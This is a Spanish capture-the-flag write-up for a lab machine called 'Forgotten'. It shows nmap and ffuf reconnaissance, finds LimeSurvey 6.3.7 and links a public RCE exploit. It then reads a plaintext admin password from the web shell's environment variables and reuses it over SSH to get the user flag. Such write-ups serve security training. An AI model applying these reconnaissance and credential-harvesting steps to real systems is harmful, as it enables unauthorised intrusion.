Forgotten

#easy #linux

Enumeración

sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 10.129.87.222 -oA allPorts

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 62

nmap -p 22,80 -sCV -Pn -n -vv 10.129.87.222 -oA openPortsServiceVersions

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 28:c7:f1:96:f9:53:64:11:f8:70:55:68:0b:e5:3c:22 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMIbLmW6I3vlf8QRrAaFLhH3Ao7CFIvqPPmQG0Z14i0SlPfX9IZobRkjLOB0ncKb5oQ/0SXLnU60rnUe+7Xe6BU=
|   256 02:43:d2:ba:4e:87:de:77:72:ce:5a:fa:86:5c:0d:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICGL/2c6HVh+6F9RbNsZpoYJ2jv4C8SGqtskv0GGuU2P
80/tcp open  http    syn-ack ttl 62 Apache httpd 2.4.56
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: 403 Forbidden
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

http://10.129.87.222/survey

LimeSurvey 6.3.7

ffuf -u http://10.129.87.222/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -i -ic

survey                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 241ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 237ms]

ffuf -u http://10.129.87.222/survey/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80 -i -ic -fs 0

themes                  [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 227ms]
modules                 [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 245ms]
admin                   [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 248ms]
assets                  [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 237ms]
upload                  [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 450ms]
docs                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 8897ms]
plugins                 [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 640ms]
vendor                  [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 881ms]
application             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 495ms]

Googlear LimeSurvey Community Edition Version 6.3.7+231127 vuln

https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

limesvc@efaa6f5097ed:/var/www/html/survey/application$ env
SHELL=bash
HOSTNAME=efaa6f5097ed
PHP_VERSION=8.0.30
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=1729F83938DA44E27BA0F4D3DBDB397470D12172 BFDDD28642824F8118EF77909B67A5C12229118F 2C16C765DBE54A088130F1BC4B9B5F600B55F3B4 39B641343D8C104B2B146DC3F9C39DC0B9698544
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/var/www/html/survey/application
APACHE_LOG_DIR=/var/log/apache2
LANG=C
LS_COLORS=
PHP_SHA256=216ab305737a5d392107112d618a755dc5df42058226f1670e9db90e77d777d9
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PHPIZE_DEPS=autoconf 		dpkg-dev 		file 		g++ 		gcc 		libc-dev 		make 		pkg-config 		re2c
LIMESURVEY_PASS=5W5HN4K4GCXf9E
TERM=xterm
PHP_URL=https://www.php.net/distributions/php-8.0.30.tar.xz
LIMESURVEY_ADMIN=limesvc
APACHE_RUN_GROUP=limesvc
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=1
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
APACHE_RUN_DIR=/var/run/apache2
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=limesvc
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PHP_ASC_URL=https://www.php.net/distributions/php-8.0.30.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=/usr/bin/env
OLDPWD=/var/www/html/survey

user: limesvc
password: 5W5HN4K4GCXf9E

ssh limesvc@10.129.87.222

limesvc@forgotten:~$ ls
user.txt
limesvc@forgotten:~$ cat user.txt

User flag

1c1b************************04cb